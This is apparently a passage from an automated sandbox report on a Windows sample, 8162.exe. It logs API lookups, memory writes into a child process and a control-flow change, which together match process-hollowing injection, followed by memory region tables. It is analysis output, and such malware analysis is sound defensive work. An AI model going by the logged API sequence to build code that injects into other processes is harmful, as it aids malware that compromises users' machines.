Operation Filename Additional Information Success Count Logfile
Get Info STD_ERROR_HANDLE False 249
Fn
Get Info False 3
Fn
Open STD_INPUT_HANDLE True 1
Fn
Open STD_OUTPUT_HANDLE True 1
Fn
Open STD_ERROR_HANDLE True 1
Fn
Process (6)
Operation Additional Information Success Count Logfile
Create C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Thread (1)
Operation Additional Information Success Count Logfile
Set Context c:\users\hjrd1k~1\appdata\local\temp\8162.exe True 1
Fn
Memory (10)
Operation Additional Information Success Count Logfile
Alloc c:\users\hjrd1k~1\appdata\local\temp\8162.exe True 1
Fn
Alloc c:\users\hjrd1k~1\appdata\local\temp\8162.exe True 1
Fn
Alloc C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Free c:\users\hjrd1k~1\appdata\local\temp\8162.exe True 1
Fn
Read C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Data
Write C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Data
Write C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Data
Write C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Data
Write C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Data
Write C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Data
Module (40)
Operation Additional Information Success Count Logfile
Load module_name = kernel32, base_address = 1970012160 True 1
Fn
Load module_name = ntdll.dll, base_address = 2005204992 True 1
Fn
Get Handle module_name = c:\windows\syswow64\kernel32.dll True 3
Fn
Get Handle module_name = mscoree.dll False 1
Fn
Get Filename True 1
Fn
Get Filename True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 1970097963 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 1970082386 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 1970094600 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 1970091423 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 1976368414 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageExtraInfo, address_out = 1976167798 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WinExec, address_out = 1970613281 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 1970099142 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 1970082434 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 1970082832 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 1970081906 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetThreadContext, address_out = 1970239956 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 1970083926 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 1970198960 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 1970083950 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadProcessMemory, address_out = 1970196428 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 1970199008 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadContext, address_out = 1970623379 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResumeThread, address_out = 1970095087 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 1970082102 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 1970082993 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 1970098593 True 1
Fn
Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtUnmapViewOfSection, address_out = 2005335152 True 1
Fn
Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtWriteVirtualMemory, address_out = 2005335556 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExA, address_out = 1976032152 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExA, address_out = 1976029742 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = PostMessageA, address_out = 1976056746 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageA, address_out = 1976007635 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcA, address_out = 2005476576 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesA, address_out = 1970099220 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 1970081280 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 1970619839 True 1
Fn
System (1)
Operation Additional Information Success Count Logfile
Process #4: 8162.exe
(Host: 49, Network: 0)
Information Value
ID #4
File Name c:\users\hjrd1k~1\appdata\local\temp\8162.exe
Command Line "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
Initial Working Directory C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor Start Time: 00:01:44, Reason: Child Process
Unmonitor End Time: 00:02:59, Reason: Terminated by Timeout
Monitor Duration 00:01:15
OS Process Information
Information Value
PID 0xbb4
Parent PID 0xba0 (c:\users\hjrd1k~1\appdata\local\temp\8162.exe)
File Name c:\users\hjrd1k~1\appdata\local\temp\8162.exe
Command Line "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
Is Created or Modified Executable False
Integrity Level Medium
Username 1R6PFH\hJrD1KOKY DS8lUjv
Groups
  • 1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000e539 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False
private_0x00000000001a0000 0x001a0000 0x0021ffff Private Memory Readable, Writable True False False
private_0x0000000000220000 0x00220000 0x0031ffff Private Memory Readable, Writable True False False
locale.nls 0x00320000 0x00386fff Memory Mapped File Readable False False False
private_0x0000000000400000 0x00400000 0x00419fff Private Memory Readable, Writable, Executable True False False
private_0x0000000000420000 0x00420000 0x004cffff Private Memory Readable, Writable True False False
private_0x00000000004e0000 0x004e0000 0x004effff Private Memory Readable, Writable True False False
pagefile_0x00000000004f0000 0x004f0000 0x00677fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000680000 0x00680000 0x00800fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000810000 0x00810000 0x008eefff Pagefile Backed Memory Readable True False False
8162.exe 0x01100000 0x01147fff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000001150000 0x01150000 0x0254ffff Pagefile Backed Memory Readable True False False
wow64cpu.dll 0x73f80000 0x73f87fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x73f90000 0x73febfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x73ff0000 0x7402efff Memory Mapped File Readable, Writable, Executable False False False
dwmapi.dll 0x74c60000 0x74c72fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x75310000 0x7538ffff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x753a0000 0x753abfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x753b0000 0x7540ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x75630000 0x7568ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x756c0000 0x757cffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x757d0000 0x757e8fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75800000 0x75845fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75a50000 0x75adffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75c60000 0x75d5ffff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75e80000 0x75f6ffff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x761a0000 0x761f6fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x76200000 0x7635bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x76360000 0x76fa9fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76fb0000 0x7707bfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x77140000 0x771ebfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x77310000 0x773acfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x773b0000 0x7744ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000077450000 0x77450000 0x7756efff Private Memory Readable, Writable, Executable True False False
private_0x0000000077570000 0x77570000 0x77669fff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77670000 0x77818fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x77820000 0x77829fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77850000 0x779cffff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe 0xba4 address = 0x400000, size = 1024 True 1
Fn
Data
Modify Memory #3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe 0xba4 address = 0x401000, size = 62976 True 1
Fn
Data
Modify Memory #3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe 0xba4 address = 0x411000, size = 18944 True 1
Fn
Data
Modify Memory #3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe 0xba4 address = 0x416000, size = 6144 True 1
Fn
Data
Modify Memory #3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe 0xba4 address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Control Flow #3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe 0xba4 os_tid = 0xbb8, address = 0x778601c4 True 1
Fn
Host Behavior
File (3)
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE True 1
Fn
Open STD_OUTPUT_HANDLE True 1
Fn
Open STD_ERROR_HANDLE True 1
Fn
Process (3)
Operation Additional Information Success Count Logfile
Module (38)
Operation Additional Information Success Count Logfile
Load module_name = advapi32.dll, base_address = 2000355328 True 1
Fn
Load module_name = shell32.dll, base_address = 1983250432 True 1
Fn
Load module_name = user32.dll, base_address = 1975910400 True 1
Fn
Get Handle module_name = c:\windows\syswow64\kernel32.dll True 1
Fn
Get Filename True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 1970097963 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 1970091423 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 1970082386 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 1970094600 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 1970097448 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 1970618635 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 1970618773 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 1970131743 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 1970204286 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 2005484572 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 2005648654 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 2005648257 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 1970204808 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 2005534167 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 2005649956 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 2005339020 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 2006121960 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 2005671453 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 1970620257 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 1970588945 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0 False 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 1970618959 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 1970620081 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 1970693750 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 1970620241 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 1970693617 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 1970620353 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 1970620385 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 1970620401 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0 False 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 1970204384 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0 False 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0 False 1
Fn
System (4)
Operation Additional Information Success Count Logfile
Sleep duration = 200 milliseconds (0.200 seconds) True 2
Fn